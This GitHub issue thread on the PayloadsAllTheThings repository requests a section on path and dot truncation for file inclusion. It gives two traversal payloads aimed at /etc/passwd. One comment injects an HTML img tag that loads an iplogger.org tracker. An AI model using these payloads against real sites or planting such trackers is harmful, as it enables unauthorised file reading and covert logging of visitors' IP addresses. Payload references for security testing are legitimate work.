### ISSUE TITLE
Add path truncation

### ISSUE THREAD

**Issue by clem9669** [swisskyrepo/PayloadsAllTheThings#51]
Add a section about Path & Dot Truncation

Path Truncation:
?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ ...

Dot Truncation:
?file=../../../../../../../../../etc/passwd...........

**Comment by xalerafera** [comment]
"><img src="https://iplogger.org/3iJBN3">

**Comment by swisskyrepo** [comment]
Done in https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#path-and-dot-truncation
